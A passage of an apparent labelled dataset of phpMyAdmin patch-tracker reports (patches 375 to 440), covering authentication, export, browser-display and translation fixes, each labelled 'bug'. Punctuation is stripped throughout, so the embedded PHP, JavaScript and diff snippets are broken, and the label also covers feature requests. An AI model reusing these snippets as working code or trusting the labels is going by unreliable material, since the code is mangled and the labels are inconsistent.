gt;s host.png); \} li li server info, li li server version\{ list style image url lt;?php echo SESSION[ PMA Theme ] gt;getImgPath ); ?
gt;s host.png); \} Original URL https sourceforge.net p phpmyadmin patches 375 https sourceforge.net p phpmyadmin patches 375 Original author windkiel","bug"
"24444","4320","HTTP authentication use REDIRECT REMOTE USER.
Dear Developers, In order to be able to use basic authentication to work with PHP5 CGI and Apache2, you should use the REDIRECT REMOTE USER environment variable instead of REMOTE USER.
See attached patch.
Please apply.
Regards, Allard Hoeve Original URL https sourceforge.net p phpmyadmin patches 376 https sourceforge.net p phpmyadmin patches 376 Original author allardh","bug"
"24444","4321","UUID default for CHAR 36) PRIMARY KEY.
This patch sets UUID function to be the default for CHAR 36) and VARCHAR 36) PRIMARY KEY columns Applies to phpMyAdmin 2.11.1 rc1 english Original URL https sourceforge.net p phpmyadmin patches 377 https sourceforge.net p phpmyadmin patches 377 Original author gert p","bug"
"24444","4322","Display patch for column rights in Opera.
This will change the height of the selectboxes to display 10 rows and corrects the line break for opera.
Diff for server privileges.php 2.11.1 186,187c186,187 lt; .
spaces .
lt; label gt; .
lt;br gt;\n lt; .
spaces .
lt;select id= select .
name .
priv name= .
name for select .
[] size=10 multiple= multiple gt; .
\n ; gt; .
spaces .
lt; label gt; .
\n gt; .
spaces .
lt;select id= select .
name .
priv name= .
name for select .
[] multiple= multiple gt; .
\n ; Original URL https sourceforge.net p phpmyadmin patches 378 https sourceforge.net p phpmyadmin patches 378 Original author svrmarty","bug"
"24444","4323","Apache SSLOptions StdEnvVars required.
I observed problem, that when I log in via https www.signless.com phpmyadmin I am redirected to http www.signless.com phpmyadmin index.php?lang=en utf 8 token=xxx Changing the protocol results in successful login.
The cause was that SSLOptions StdEnvVars was not set in my apache configuration and therefore autodetection fails.
Many vendors will have this as the default for .php files but in some cases it is not.
I suggest an entry in the FAQ When I try to connect via https, I can log in, but then my connection is redirected back to http.
What can cause this behavior?
Be sure that you have enabled SSLOptions StdEnvVars in your Apache configuration.
See http httpd.apache.org docs 2.0 mod mod ssl.html ssloptions Another user reports the same problem in the forums http sourceforge.net forum message.php?msg id=3864671 Thanks!
JT Original URL https sourceforge.net p phpmyadmin patches 379 https sourceforge.net p phpmyadmin patches 379 Original author jtjustman","bug"
"24444","4324","let browser detect font size changes.
changes in font size are not noticed by the browser after patch 1787915 any more.
Original URL https sourceforge.net p phpmyadmin patches 380 https sourceforge.net p phpmyadmin patches 380 Original author windkiel","bug"
"24444","4325","Incorrect login via URL.
Notice Undefined index pma servername in F \07PMA\PmaStable\ libraries\auth\cookie.auth.lib.php on line 381 when called like this http 127.0.0.1 07PMA PmaStable ?pma username=root patch if !
empty REQUEST[ pma username ])) \{ The user just logged in GLOBALS[ PHP AUTH USER ] = REQUEST[ pma username ]; GLOBALS[ PHP AUTH PW ] = empty REQUEST[ pma password ]) ?
REQUEST[ pma password ]; if GLOBALS[ cfg ][ AllowArbitraryServer ]) \{ \ if GLOBALS[ cfg ][ AllowArbitraryServer ] isset REQUEST[ pma servername ])) \{ GLOBALS[ pma auth server ] = REQUEST[ pma servername ]; \} return true; \} Original URL https sourceforge.net p phpmyadmin patches 381 https sourceforge.net p phpmyadmin patches 381 Original author windkiel","bug"
"24444","4326","Notice ... failed to flush buffer.. error Notice ob flush ) [ref.outcontrol] failed to flush buffer.
No buffer to flush.
in apache sites baliston.fr myadmin libraries ob.lib.php on line 101 file ob.lib.php line 101 code of origin if PMA outBufferModeGet )) \{ ob flush ); \} else \{ flush ); \} modified code if ob get status ) PMA outBufferModeGet ) ) \{ ob flush ); \} else \{ flush ); \} By putting the modified code, the error does not appear any more.
Original URL https sourceforge.net p phpmyadmin patches 382 https sourceforge.net p phpmyadmin patches 382 Original author bertrand r","bug"
"24444","4327","HTTP authentication with php mod fastcgi.
Dear Developers, In order to be able to use http authentication to work with PHP MOD FASTCGI and fix errors FastCGI comm with server php bin php aborted error parsing headers duplicate header status you shoud not send header status 401 Unauthorized ) if phpmyadmin works under the fcgi environment.
See attached patch.
Please apply.
Regards, yarodin Original URL https sourceforge.net p phpmyadmin patches 383 https sourceforge.net p phpmyadmin patches 383 Original author yarodin","bug"
"24444","4328","Plug in on exporting NHibernate files.
I just developed a phpMyAdmin plug in on exporting NHibernate files.
It works fine with phpMyAdmin 2.11.2 and NHibernate 1.2.0.
I think this codegen could cover more than NHibernate.
For instance Java Hibernate, PHP PDO, JSON, etc.
So I name it codegen.
caocao from Shanghai ;) ==Done== It accepts two formats of output files which are NHibernate C DO and NHibernate XML.
==Todo== It s in English only and needs traslation.
It covers most primitive types but not all of them.
So someone needs to make it cover all types.
There is no data validation in NHibernate C DO.
Need to be done in future.
Original URL https sourceforge.net p phpmyadmin patches 384 https sourceforge.net p phpmyadmin patches 384 Original author sjtucaocao","bug"
"24444","4329","Fatal Error if cfg[ ServerDefault ] = 0;.
if cfg[ ServerDefault ] = 0; multiple servers) pma3 starts with a Fatal error Call to undefined function PMA DBI get client info ) in F \PMA\trunk\main.php on line 294 patch attached Greetings, Jxc3xbcrgen Original URL https sourceforge.net p phpmyadmin patches 385 https sourceforge.net p phpmyadmin patches 385 Original author windkiel","bug"
"24444","4330","A little JavaScript error in Query Window.
In Query Window on pages Inport Files and SQL history there is a JavaScript error that points on this string document.getElementById sqlquery ).focus ); The point is that we have input field for SQL query to focus on only on pages sql and full, but not on pages history and files.
The problem string is generating in querywindow.php line 225.
Solution may be like this.
var sQuerydisplay tab = document.getElementById querydisplay tab ).value; if sQuerydisplay tab == sql || sQuerydisplay tab == full ) \{ document.getElementById sqlquery ).focus ); \} Original URL https sourceforge.net p phpmyadmin patches 386 https sourceforge.net p phpmyadmin patches 386 Original author hanut","bug"
"24444","4331","Login interface broken on Konqueror.
When opening the phpmyamdin login screen and enlarging the fonts in the browser window, the login and password labels and fields will wrap incorrectly, leading to this view Username [USERNAME FIELD] Password [PASSWORD FIELD] The problem seems to happen faster in Konqueror, but can also be seen in Firefox.
It happens in any language, although it seems like French makes it worse, because of it s longer labels consisting of different words.
Screenshots and original report can be found in Mandriva s bugzilla http qa.mandriva.com show bug.cgi?id=22020 A suggested patch fixing this issue can be found here http qa.mandriva.com attachment.cgi?id=5269 Original URL https sourceforge.net p phpmyadmin patches 387 https sourceforge.net p phpmyadmin patches 387 Original author fhimpe","bug"
"24444","4332","catalan translation not in UTF 8.
The file shipped with version 2.11.2.2 verified that it is the same than in trunk) is in ASCII format, not in UTF 8.
I attach the converted to UTF 8 file used recode for it) Original URL https sourceforge.net p phpmyadmin patches 388 https sourceforge.net p phpmyadmin patches 388 Original author jaz001","bug"
"24444","4333","add In field in DB search.
For very big databases Original URL https sourceforge.net p phpmyadmin patches 389 https sourceforge.net p phpmyadmin patches 389 Original author obiserver","bug"
"24444","4334","CSV Escape character not exported right.
For the fonction export CSV, it seems that it does not respect the format generated by SELECT ...
INTO file ...
NOR the one expected by LOAD DATA ... in regards of the escape character.
Here is my exemple id name 1 my\value File generated by Export phpmyadmin CSV params ; , , \ , \r\n )is 1 ; my\value Export with mysql SELECT ..
INTO file same params) is 1 ; my\\value Then when this file is importing with LOAD DATA ... same params) The phpmyadmin file gives id name 1 myvalue The mysql SELECT ...
INTO file gives id name 1 my\value Which is correct.
This is the case since at least version 2.6.1 to 2.11.3.
So I really wonder is it a normal behaviour or not?
Anyhow the fix that may be needed could be in libraries export csv.php line 163 as in pma 2.6.1 str replace enclosed, escaped .
enclosed, row[ j]) changed by str replace enclosed, escaped .
enclosed, str replace escaped, escaped .
escaped, row[ j]) ) Original URL https sourceforge.net p phpmyadmin patches 390 https sourceforge.net p phpmyadmin patches 390 Original author nicolasdigraf","bug"
"24444","4335","cache control missing PHP CGI).
I couldn t login following steps.
1\.
Setup phpMyAdmin with cookie certification.
2\.
Try to login with the wrong username or password.
gt; It will result the error message server connection failed) 3\.
Login with the correct username and password.
4\.
The error message.
This problem with Firefox 2.0 3.0 beta), without IE6 Safari.
I checked the http response header at STEP 4).
Expires Thu, 19 Nov 1981 08 52 00 GMT Cache Control private, max age=10800, pre check=10800 Under HTTP 1.1 RFC2068), Cache Control header overwrite Expires header.
So browser cache control will be enabled at STEP 4).
I think the response should be Expires Thu, 19 Nov 1981 08 52 00 GMT Cache Control no store, no cache, must revalidate Pragma no cache Original URL https sourceforge.net p phpmyadmin patches 391 https sourceforge.net p phpmyadmin patches 391 Original author stmfd","bug"
"24444","4336","making db pager work when js is disabled.
for those who prefer to work w o javascript added lt;noscript gt; lt;input type= submit ... lt; noscript gt; added basename and target to the lt;form action= .
, basename script), method= post target= ...... fixed lt;select name= goToPage to name= pos , in trunk libraries common.lib.php Original URL https sourceforge.net p phpmyadmin patches 392 https sourceforge.net p phpmyadmin patches 392 Original author windkiel","bug"
"24444","4337","Duplicate search.
Hello, I once needed a duplicate search on my database so I added this script to automate the process.
I figured maybe it could be added.
I used the link below a field name when browsing.
Duplicate search URL if analyzed sql[0][ group by clause ] analyzed sql[0][ having clause ]) \{ dup url = ; \} else \{ dup field = PMA backquote fields meta[ i] gt;name); dup table = PMA backquote table); dup query = SELECT .
dup field .
, COUNT ) AS n FROM .
dup table .
GROUP BY .
dup field .
HAVING n gt; 1 ; dup url = sql.php?
.
PMA generate common url db, table) .
amp;amp;sql query= .
urlencode dup query); \} ........ if dup url != ) \{ dup link = PMA linkOrButton dup url, lt;font size= 1 gt; Find duplicates) lt; font gt; , , false, false); \} ........ if SESSION[ userconf ][ disp direction ] == horizontalflipped ) \{ echo valign= bottom ; \} echo gt; .
order link .
dup link.
comments .
lt; th gt; ; End Original URL https sourceforge.net p phpmyadmin patches 393 https sourceforge.net p phpmyadmin patches 393 Original author tsynique","bug"
"24444","4338","dateformat transformation and UNIX timestamps.
When using the text plain dateformat on a field with a UNIX timestamp, certain dates are displayed incorrectly.
For example, the timestamp 1201118296 Jan 23, 2008 at 7 58 PM) is displayed as Jan 14, 2012 at 11 36 AM It looks like the timestamp is being treated as 12 01 11 82 96 Original URL https sourceforge.net p phpmyadmin patches 394 https sourceforge.net p phpmyadmin patches 394 Original author spam38","bug"
"24444","4339","Display issues on Opera 9.50.
With Opera 9.50 I get some minnor display issues.
I have attached a screenshot to show the issue.
Most likely it s a simple CSS fix.
Original URL https sourceforge.net p phpmyadmin patches 395 https sourceforge.net p phpmyadmin patches 395 Original author asmodai","bug"
"24444","4340","Typo in Japanese lang files.
Hi Maybe inputting error.. lang japanese utf 8.inc.php lang japanese euc.inc.php lang japanese sjis.inc.php Line 531 lt;i gt; s lt; i gt; It s not but Original URL https sourceforge.net p phpmyadmin patches 396 https sourceforge.net p phpmyadmin patches 396 Original author acoustype","bug"
"24444","4341","TCPDF update to 2.6.001 version.
TCPDF external library was updated to 2.2.001 version.
To upgrade copy the files on the attached zip to phpMyAdmin libraries tcpdf CHANGES from current version The latest TCPDF version fixes dozens of bugs and introduces several new features complete RTL languages support i.e.
Arabic, Hebrew, Persian); new graphic and transformation functions.
Javascript and forms support.
Bookmarking.
Original URL https sourceforge.net p phpmyadmin patches 397 https sourceforge.net p phpmyadmin patches 397 Original author nicolaasuni","bug"
"24444","4342","valid YAML.
properly handle line breaks so that exported YAML is valid Original URL https sourceforge.net p phpmyadmin patches 398 https sourceforge.net p phpmyadmin patches 398 Original author danbarry","bug"
"24444","4343","Auto Complete for sql window.
Hello, most database tools offer auto completion for writing SQL queries e.g.
pgAdmin3, pl sql developer).
I think it would be great to have this feature in phpMyAdmin.
I ve written a small demo to offer sql auto completion for a normal textarea tested with MySQL5 and Firefox2).
In this first draft, auto complete is done for databases, tables and columns.
The user types some sql in the textarea and the selectbox on the right side gets filled automatically.
When typing in the textarea, some keys are bound to the selectbox cursor up, cursor down, escape and enter), so the user can directly insert values from the selectbox to the textarea.
What do you think about it?
Would you like to add it to one of the next releases?
Best regards, Thomas Bley Original URL https sourceforge.net p phpmyadmin patches 399 https sourceforge.net p phpmyadmin patches 399 Original author thomasbley","bug"
"24444","4344","Remove BOM character in Swedish language file .
In version 2.11.5.x there s an invisible Byte Order Mark character at the beginning of the Swedish language file Windows Notepad inserts this character never use that application for editing UTF 8 files!).
This causes PMA to display a blank page or the Headers already sent error message if error reporting is enabled.
This patch fixes this issue.
Original URL https sourceforge.net p phpmyadmin patches 400 https sourceforge.net p phpmyadmin patches 400 Original author samuellb","bug"
"24444","4345","colon in PW prevents login http).
when users have a colon in their password they can t login using auth type http on some CGI installations due to the explode function.
fix for, e.g., version QA 2 11, libraries auth version Id http.auth.lib.php 10893 2007 11 01 20 59 48Z lem9 line 140 if !empty usr pass) strpos usr pass, ) !== false) \{ list PHP AUTH USER, PHP AUTH PW) = explode , usr pass); \} \ if !empty usr pass)) \{ \ colon = strpos usr pass, ); \ if colon) \{ \ PHP AUTH USER = substr usr pass, 0, colon); \ PHP AUTH PW = substr usr pass, colon 1); \ \} \ unset colon); \ \} Original URL https sourceforge.net p phpmyadmin patches 401 https sourceforge.net p phpmyadmin patches 401 Original author windkiel","bug"
"24444","4346","headers already sent config file with BOM.
A classic php error msg, which has been plaguing mysql since forever.
This time around it stems from something being flushed to php stdout by the eval function in PMA Config Load ).
It might be because my config file is coming from an old phpmyadmin version, it might be because of some cosmic particle traversing my laptop.
Of course, setcookie ) does not work after that, and the php error is triggered.
Suggested patch use ob start ob end clean to prevent the included file its supposed to be a config after all) to hit stdout in line 371 of config.class.php change to Parses the configuration file old error reporting = error reporting 0); ob start ); if function exists file get contents )) \{ eval result = eval ?
gt; .
trim file get contents this gt;getSource )))); \} else \{ eval result = eval ?
gt; .
trim implode \n , file this gt;getSource ))))); \} ob end clean ); error reporting old error reporting); Original URL https sourceforge.net p phpmyadmin patches 402 https sourceforge.net p phpmyadmin patches 402 Original author ggiunta","bug"
"24444","4347","no tilde for InnoDB row counter where not needed.
phpMA would always show a tilde sign in front of InnoDB table, even if the estimated rows was below MaxExactCount and we counted rows with SELECT COUNT ) FROM ... .
This tiny patch introduces an additional record into table properties set, so we know for sure if the row count was estimated or properly measured.
no tilde for InnoDB row counter where we know it for sure Original URL https sourceforge.net p phpmyadmin patches 403 https sourceforge.net p phpmyadmin patches 403 Original author dandy76","bug"
"24444","4348","SweKey Hardware Authentication Key.
This patch allow the use of the Feebee Hardware Usb Authentication Key.
The hardware authentication is enabled only if a file feebees.conf is detected next to index.php.
The hardware authentication is enabled only for auth type = cookie yet.
Changes are very minimal in the existing code only cookie.auth.lib.php is affected), all the specific code has been centralized in the libraries auth feebee directory.
The Feebee authentication key is not commercialized yet but I can send free samples if required for testing.
3 users strings exist but are not localized yet.
Original URL https sourceforge.net p phpmyadmin patches 404 https sourceforge.net p phpmyadmin patches 404 Original author landre3567","bug"
"24444","4349","block brute force attacks patch.
phpmyadmin can easily be attacked by brute force.
this simple protection will block pma for 1 minute after 5 wrong loginattempts.
see also https sourceforge.net tracker index.php?func=detail aid=1975401 group id=23067 atid=377411 open the file libraries auth cookie.auth.lib.php search for function PMA auth fails ) around line 583) replace this PMA auth ); \} end of the PMA auth fails ) function with patch to block brute force attacks by Ruben Barkow rubo77) http entikey.z11.de if !empty SESSION[ login failure ])) \{ login failure blocktime=60; time in s within passwordattempts are blocked logins failed=0; foreach SESSION[ login failure ] as timestamp)\{ if timestamp login failure blocktime gt;time )) logins failed ; \} \} if logins failed gt;=5) \{ die too many attempts!
); \} store login failure in session SESSION[ login failure ][]=time ); end of brute force patch PMA auth ); \} end of the PMA auth fails ) function Original URL https sourceforge.net p phpmyadmin patches 405 https sourceforge.net p phpmyadmin patches 405 Original author rubo77","bug"
"24444","4350","Enum and , escaping is incorrect.. when dealing with enums sets displaying their definitions, populating the field when editing the table) the current regex does not match properly when provided with more complex strings consisting of and , the current code line 257 259 of tbl structure.php) if preg match set|enum)\ .
)\) i , type, tmp)) \{ tmp[2] = substr preg replace [ ,])\ \ , \\1\\\ , , .
tmp[2]), 1); type = tmp[1] .
.
str replace , , , , tmp[2]) . )
; does not escape consistently when there are enum values such as this , total enum value with enclosing quotes) as mysql returns this as this , , phpmyadmin will attempt to populate the string with \ to escape the quotes this is important when resubmitting the field from editing.)
this produces \ this\ , \ which is plainly wrong.
the fix, while less elegant regex wise, is comparable in speed and works happily with these values.
attached) Original URL https sourceforge.net p phpmyadmin patches 409 https sourceforge.net p phpmyadmin patches 409 Original author devians","bug"
"24444","4351","make safari set the actual timedate on dumps.
patch to make safari set the actual timedate to the dump file in pma 2.11.7 export.php after line 365 header Pragma no cache ); \ if SAFARI == PMA USR BROWSER AGENT) \{ \ header Last Modified .
gmdate D, d M Y H i s ) .
GMT ); \ \} thx Sebastian) tested on safari win2000 and mac os thx to ibenneth) Original URL https sourceforge.net p phpmyadmin patches 410 https sourceforge.net p phpmyadmin patches 410 Original author windkiel","bug"
"24444","4352","Table List Pagination.
Patch for table list pagination in the left navigation window http sourceforge.net tracker index.php?func=detail aid=1772222 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 406 https sourceforge.net p phpmyadmin patches 406 Original author jday29","bug"
"24444","4353","Opera 9.50 No scrolling possible on long results.
When displaying results longer than the window, the vertical scrollbar does not work.
Changing the size of the window maximize restore) makes scrolling possible.
Original URL https sourceforge.net p phpmyadmin patches 407 https sourceforge.net p phpmyadmin patches 407 Original author joergent","bug"
"24444","4354","Fix for typos in comments.
This patch fixes many many typos and other mistakes in comments.
Of course the list is not complete, but it s all i could find in my first run.
Diff file provided Original URL https sourceforge.net p phpmyadmin patches 408 https sourceforge.net p phpmyadmin patches 408 Original author knittl","bug"
"24444","4355","Cross frame scripting protection.
This is a test patch for QA 2 11 to enable protection against cross frame scripting.
Original URL https sourceforge.net p phpmyadmin patches 411 https sourceforge.net p phpmyadmin patches 411 Original author lem9","bug"
"24444","4356","BLOBStreaming Support for phpMyAdmin.
The diff attached is for rev 11365 of phpMyAdmin 3.0 dev The following files are not included in the diff bs play media.php bs change mime type.php libraries blobstreaming.lib.php but can be obtained from svn sebastianmendel.de phpMyAdmin gsoc2008 bs Original URL https sourceforge.net p phpmyadmin patches 412 https sourceforge.net p phpmyadmin patches 412 Original author rajkissu","bug"
"24444","4357","TIMEOUT PATCHES.
koebo asked me on IRC) to submit this couldn t login) TIMEOUT PATCHES ========= In case of server parameters in config.inc.php are wrong ie bad or filtered host in mysql privileges) or mysql server lags intercept it after 3 cfg[ Servers ][ i][ timeout ] defined in common.inc.php) Without this patch even with a good login pass combination, you won t be able to identify and you won t know even why as no error is displayed.
Mit freundlichen Grxc3xbcssen\Cheers\Salutations, Koebo Original URL https sourceforge.net p phpmyadmin patches 413 https sourceforge.net p phpmyadmin patches 413 Original author windkiel","bug"
"24444","4358","link FAQ references in messages.
The attached patch links references to the FAQ in pma messages to the relevant FAQ item.
Made against 3.0.0 beta.
Original URL https sourceforge.net p phpmyadmin patches 414 https sourceforge.net p phpmyadmin patches 414 Original author kink","bug"
"24444","4359","fix javascript error without frameset.
works had already been done for most of the scripts in right frame so they check parent functions available before calling script from parent but some one obviously didn t take care of this when inserting new scripts.
here s the patch Original URL https sourceforge.net p phpmyadmin patches 417 https sourceforge.net p phpmyadmin patches 417 Original author xuefer","bug"
"24444","4360","SSO Single Sign on) cookie clearing.
My apologies in advance if this is a duplicate bug or if this is not really a bug.
Basically, I have a Single Sign On SSO) page that redirects directly into https mywebserver phpMyAdmin once it s set the appropriate session variables.
With the latest 3.0.0 beta on PHP 5.2.6 and MySQL 5.0.67, I ve run into the issue where the first time you visit the SSO page, you are logged out; the second time, it works.
I ve found that the cookie clearing code in phpMyAdmin libraries common.inc.php beginning on line 240 and after around revision 11302 or so, seems to be a little agressive in that it ll clear all cookie variables i.e.
COOKIE = array )) if there is no pmaCookieVer cookie set.
If you are using a SSO page that redirects users directly into phpMyAdmin for the first time, obviously, pmaCookieVer will not be set.
If the COOKIE variable has been reset, isset COOKIE[ session name]) will fail in libraries auth signon.auth.lib.php and phpMyAdmin will think SSO has failed.
Using the patch I ve attached solves this issue for me.
If this is reproducible, another solution might be to make it more clear you need to set pmaCookieVer in your SSO code.
Original URL https sourceforge.net p phpmyadmin patches 415 https sourceforge.net p phpmyadmin patches 415 Original author cws125","bug"
"24444","4361","missing svn eol style.
find .
iname \ .php | while read i; do if [[ svn pg svn eol style i) = ]]; then echo i; fi; done .
test PMA generateCommonUrl test.php .
test PMA blowfish test.php .
test PMA transformation getOptions test.php .
test PMA STR sub test.php .
test PMA isValid test.php .
bs change mime type.php .
lang bangla utf 8.inc.php .
lang macedonian cyrillic utf 8.inc.php .
setup lang english utf 8.inc.php .
setup lib validate.lib.php .
setup lib FormDisplay.tpl.php .
setup lib forms.inc.php .
setup lib Form.class.php .
setup lib common.inc.php .
setup lib index.lib.php .
setup lib ConfigFile.class.php .
setup lib config info.inc.php .
setup lib FormDisplay.class.php .
setup lib form processing.lib.php .
setup index.php .
setup config.php .
setup frames form.inc.php .
setup frames menu.inc.php .
setup frames index.inc.php .
setup frames config.inc.php .
setup frames servers.inc.php .
setup validate.php .
libraries display change password.lib.php .
libraries db events.inc.php .
libraries Partition.class.php .
libraries tbl triggers.lib.php .
libraries export texytext.php .
libraries export codegen.php .
libraries zip extension.lib.php .
libraries blobstreaming.lib.php .
libraries PMA.php .
libraries tcpdf font dejavuserifb.php .
libraries tcpdf font dejavusansb.php .
libraries tcpdf unicode data.php .
libraries auth swekey swekey.php .
libraries auth swekey swekey.auth.lib.php .
libraries auth swekey unplugged.php .
libraries auth swekey authentication.inc.php .
libraries Message.class.php .
libraries header scripts.inc.php .
libraries transformations text plain longToIpv4.inc.php .
libraries engines pbxt.lib.php .
webapp.php .
config.inc.php .
bs play media.php for fix it find .
iname \ .php | while read i; do if [[ svn pg svn eol style i) = ]]; then echo i; fi; done | xargs svn ps svn eol style native svn ci Original URL https sourceforge.net p phpmyadmin patches 419 https sourceforge.net p phpmyadmin patches 419 Original author xuefer","bug"
"24444","4362","Cannot restore to none at first reques.
1\.
select a table, select export 2\.
SQL compatibility mode ANSI, submit, you get all fields quoted by double quote so ANSI is working.
it s now ANSI mode 3\.
select NONE, click submit, i got ......) TYPE=InnoDB; 4\.
select NONE, click submit again, i got .....) ENGINE=InnoDB DEFAULT CHARSET=utf8; the first NONE submit is incorrectly handled Index sql.php =================================================================== sql.php revision 11534) sql.php working copy) 189,8 189,13 global cfg; global mysql charset map; if isset GLOBALS[ sql compatibility ]) GLOBALS[ sql compatibility ] != NONE ) \{ PMA DBI try query SET SQL MODE= .
GLOBALS[ sql compatibility ] .
); \ if isset GLOBALS[ sql compatibility ])) \{ \ if GLOBALS[ sql compatibility ] == NONE ) \{ \ PMA DBI query SET SQL MODE= ); \ \} \ else \{ \ PMA DBI try query SET SQL MODE= .
GLOBALS[ sql compatibility ] .
); \ \} \} head = PMA exportComment phpMyAdmin SQL Dump ) .
PMA exportComment version .
PMA VERSION) Original URL https sourceforge.net p phpmyadmin patches 416 https sourceforge.net p phpmyadmin patches 416 Original author xuefer","bug"
"24444","4363","Show BINARY displaying opposite result.
Show BINARY displaying opposite result when Check Optimize Repair Analyze tables.
I think this should fix it.
libraries display tbl.lib.php line 1329 lt; if SESSION[ userconf ][ display binary ] || isset GLOBALS[ is analyse ]) GLOBALS[ is analyse ])) \{ gt; if !
SESSION[ userconf ][ display binary ] || isset GLOBALS[ is analyse ]) GLOBALS[ is analyse ])) \{ Original URL https sourceforge.net p phpmyadmin patches 425 https sourceforge.net p phpmyadmin patches 425 Original author kocchi","bug"
"24444","4364","display None when there s no default value.
pma display the same when default is or when no deafult value is present, no one can see the difference.
this patch make pma display in lt;i gt;no lt; i gt; for no default case.
hope it helps Original URL https sourceforge.net p phpmyadmin patches 418 https sourceforge.net p phpmyadmin patches 418 Original author xuefer","bug"
"24444","4365","loads of notices generated during search.
Line 952 2.11.9) or line 906 trunk) of relation.lib.php tries to reference an associative array element that might not always exist.
So for every field in the database a PHP notice is generated undefined index.)
Here s what I did to fix it foreach disp row as relrow) \{ \ if !isset relrow[ foreign field])) \{ \ value = ; \ \} else \{ key = relrow[ foreign field]; if the display field has been defined for this foreign table if foreign display) \{ value = relrow[ foreign display]; \} else \{ value = ; \} end if foreign display) \ \} end if foreign[ key] = value; \} end foreach Original URL https sourceforge.net p phpmyadmin patches 420 https sourceforge.net p phpmyadmin patches 420 Original author miken32","bug"
"24444","4366","Checkboxes and IE7.
It seems that there was a bugfix in IE7 which causes now problems with a work around made for IE Versions gt;=5 When you try to insert or edit a table row with a IE7 Browser all checkboxes on the page tbl change.php) are unchecked when you click somewhere in the page.
After searching for a while i found the solution in line 169 of the file tbl change.php chg evt handler = PMA USR BROWSER AGENT == IE PMA USR BROWSER VER gt;= 5 ) must be changed to chg evt handler = PMA USR BROWSER AGENT == IE PMA USR BROWSER VER gt;= 5 PMA USR BROWSER VER lt; 7) Best regards martin Original URL https sourceforge.net p phpmyadmin patches 421 https sourceforge.net p phpmyadmin patches 421 Original author maschg","bug"
"24444","4367","PDF schema option to display just the keys.
Sorry for the way this patch is presented lem9, but the rules on the proxy on the company are so dacronic that I couldn t for my life connect to the repository.
This patch gives the user the option, via a new global variable to choose if, when generating the PDF SCHEMA, they will show all the fields on the tables, or only the keys.
By keys here, the code gets every key on the table, and get the name of the field it uses, for multi field key, it gets the onw with sequence index = 1; The txt file is the patch to the pdf schema.php file.
I m still trying to make the SVN work, if I find some way I will make a diff\patch NEW GLOBAL VARIABLE cfg[ ShowOnlyKeys ]= default FALSE If = TRUE than it shows only the keys, if FALSE, shows all fields Original URL https sourceforge.net p phpmyadmin patches 422 https sourceforge.net p phpmyadmin patches 422 Original author yohanleafheart","bug"
"24444","4368","Sortable Database Columns.
I ve written some code to sort the columns when viewing a database.
This is handy for sorting by the number of rows, table size, overhead, etc.
One caveat is that it only sorts the current page.
If there are multiple pages of tables then each page will sort independently.
This is because I put the main sort logic in libraries db info.inc.php .
By the time I start sorting the data has already been retrieved.
This is a slight drawback, but makes sorting MUCH easier.
Thanks!
Original URL https sourceforge.net p phpmyadmin patches 430 https sourceforge.net p phpmyadmin patches 430 Original author brycethornton","bug"
"24444","4369","Extra back ref.
when editing Table specific privs.
When editing Table specific privileges I kept getting stuck on that page.
Upon hitting GO I would return on the same page with no easy way to get back to the Database specific privileges page, where I had come from.
When using this, I usually have to edit user privileges for more then one table, therefore going back would be preferable.
To make this possible I added an additional link to the top of the page, which seemed the most logical place.
Any feedback for a better placement of this link) is welcome.
Original URL https sourceforge.net p phpmyadmin patches 432 https sourceforge.net p phpmyadmin patches 432 Original author helmo","bug"
"24444","4370","Temporary uploaded file not deleted.
phpMyAdmin 3.0.0 php 5.2.6 MySQL 5.0.67 Windows 2003 server IIS 6 open basedir is defined in php.ini When trying to import a .sql file, it gets uploaded from my local drive and then the temporary file on the server is moved into the .
tmp folder inside the phpMyAdmin folder.
The data is imported correctly.
The problem is that the temporary file inside the .
tmp folder does not get deleted after the import, even though there are sufficent permissions to delete it.
Near the bottom of import.php is the following code which deletes the temporary file that was created for the import.
Cleanup temporary file if file to unlink != ) \{ unlink file to unlink); \} By inserting fclose file to unlink); prior to the unlink file to unlink); the temporary file in the phpMyAdmin tmp folder will get deleted after the import.
Original URL https sourceforge.net p phpmyadmin patches 423 https sourceforge.net p phpmyadmin patches 423 Original author dmisc","bug"
"24444","4371","Wrong message when changing password.
Was a change of password successfully user get the message The password is empty!
.
I think the error is on line 1170 in server privileges.php message = PMA Message success strPasswordEmpty ); The varible should set to message = PMA Message success strPasswordChanged ); Original URL https sourceforge.net p phpmyadmin patches 424 https sourceforge.net p phpmyadmin patches 424 Original author zytisin","bug"
"24444","4372","Navi panel server links wrong.
Problem When config parameter DisplayServersList is set to TRUE all server links in left navigation frame link to current server.
This is because function PMA generate common url defined in url generating.lib.php, called in select server lib.php on line 88) always uses GLOBALS[ server ] line 244) instead of testing for server parameter in function argument.
My) Solution Change line 242 243 in url generating.lib.php to if isset GLOBALS[ server ]) GLOBALS[ server ] != GLOBALS[ cfg ][ ServerDefault ] !
params[ server ]) ... don t know if that breaks anything else, it just stops overwriting params[ server] with GLOBALS[ server ] if in the function argument was a server parameter.
I haven t checked any security implications don t know the source code very well).
Original URL https sourceforge.net p phpmyadmin patches 426 https sourceforge.net p phpmyadmin patches 426 Original author martinstricker","bug"
"24444","4373","English language cleanup.
Hi, I ve gone through the English language file and done some minor grammatical cleanup.
I also caught one typo).
The proposed changes are attached.
Thanks isaac Original URL https sourceforge.net p phpmyadmin patches 427 https sourceforge.net p phpmyadmin patches 427 Original author ibennetch","bug"
"24444","4374","Use hex for var)binary fields.
Hi, Could you use hex for var)binary fields, both when displaying and editing them?
Currently you re showing them as text, but those fields most likely don t contain valid UTF 8 characters.
Original URL https sourceforge.net p phpmyadmin patches 428 https sourceforge.net p phpmyadmin patches 428 Original author olafvdspek","bug"
"24444","4375","Possibility of disabling the sliders.
Hi, I dont like the sliders.
So I would like to be able to hide the switch that hides the content ; ) The function PMA generate slider effect in common.lib.php could start with this piece of code if GLOBALS[ cfg ][ InitialSlidersState ] == disabled ) \{ ?
gt; lt;div id= lt;?php echo id; ?
gt; gt; lt;?php return; \} Original URL https sourceforge.net p phpmyadmin patches 438 https sourceforge.net p phpmyadmin patches 438 Original author virsacer","bug"
"24444","4376","Fixes for Silkline Theme.
I have fixed the Silkline CSS to work with PMA trunk, diff attached.
Original URL https sourceforge.net p phpmyadmin patches 429 https sourceforge.net p phpmyadmin patches 429 Original author woogi","bug"
"24444","4377","Valid XHTML.
Some pages made valid...
Original URL https sourceforge.net p phpmyadmin patches 440 https sourceforge.net p phpmyadmin patches 440 Original author virsacer","bug"
"24444","4378","Row count tooltip wrong for information schema.
Hi, For information schema, the tooltips initially all display 0 rows, while phpmyadmin apparently doesn t know the row count.
After you ve browsed a table, it displays the correct count for that table.
